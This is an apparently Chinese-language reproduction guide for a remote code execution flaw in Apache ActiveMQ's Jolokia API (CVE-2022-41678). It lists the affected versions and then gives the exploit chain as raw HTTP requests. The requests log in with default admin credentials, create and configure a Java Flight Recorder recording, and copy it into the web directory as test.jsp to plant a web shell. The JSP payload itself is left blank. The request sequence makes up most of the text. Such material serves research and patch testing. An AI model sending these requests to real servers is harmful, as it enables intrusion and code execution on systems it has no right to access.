影响范围
Apache ActiveMQ before 5.16.6
Apache ActiveMQ 5.17.0 before 5.17.4
Apache ActiveMQ 5.18.0 unaffected
Apache ActiveMQ 6.0.0 unaffected
漏洞复现版本下载
https://activemq.apache.org/activemq-5017000-release
漏洞复现
新建记录
POST /api/jolokia/ HTTP/1.1
Host: localhost:8161
Origin:localhost:8161
Authorization: Basic YWRtaW46YWRtaW4=
Connection: close
Content-Type: application/json
Content-Length: 136
{
"type": "EXEC",
"mbean": "jdk.management.jfr:type=FlightRecorder",
"operation": "newRecording",
"arguments": []
}
记住这个 value
参数中的值,后面的poc要用到,例如现在是4
写入payload
payload太长了,放在最后了
POST /api/jolokia/ HTTP/1.1
Host: localhost:8161
Origin:localhost:8161
Authorization: Basic YWRtaW46YWRtaW4=
Connection: close
Content-Type: application/json
Content-Length: 136
{
"type": "EXEC",
"mbean": "jdk.management.jfr:type=FlightRecorder",
"operation": "setConfiguration",
"arguments": [4,""]
}
导出录制到web目录
POST /api/jolokia/ HTTP/1.1
Host: localhost:8161
Origin:localhost:8161
Authorization: Basic YWRtaW46YWRtaW4=
Connection: close
Content-Type: application/json
Content-Length: 141
{
"type": "EXEC",
"mbean": "jdk.management.jfr:type=FlightRecorder",
"operation": "startRecording",
"arguments": [4]
}
POST /api/jolokia/ HTTP/1.1
Host: localhost:8161
Origin:localhost:8161
Authorization: Basic YWRtaW46YWRtaW4=
Connection: close
Content-Type: application/json
Content-Length: 138
{
"type": "EXEC",
"mbean": "jdk.management.jfr:type=FlightRecorder",
"operation": "stopRecording",
"arguments": [4]
}
导出到web目录
POST /api/jolokia/ HTTP/1.1
Host: localhost:8161
Origin:localhost:8161
Authorization: Basic YWRtaW46YWRtaW4=
Connection: close
Content-Type: application/json
Content-Length: 159
{
"type": "EXEC",
"mbean": "jdk.management.jfr:type=FlightRecorder",
"operation": "copyTo",
"arguments": [4,"../../webapps/test.jsp"]
}
test.jsp写入成功
漏洞来源
- https://l3yx.github.io/2023/11/29/Apache-ActiveMQ-Jolokia-%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E-CVE-2022-41678-%E5%88%86%E6%9E%90/
- https://github.com/wy876/POC/
payload
本地搭建源码,环境配置不正确,无法调试代码,payload是搜索GitHub关键字找到的
- https://github.com/gradle/gradle-profiler/blob/2eb14e031fbd48203fb05b28183decd1ee2304de/src/main/resources/org/gradle/profiler/jfr/openjdk.jfc#L4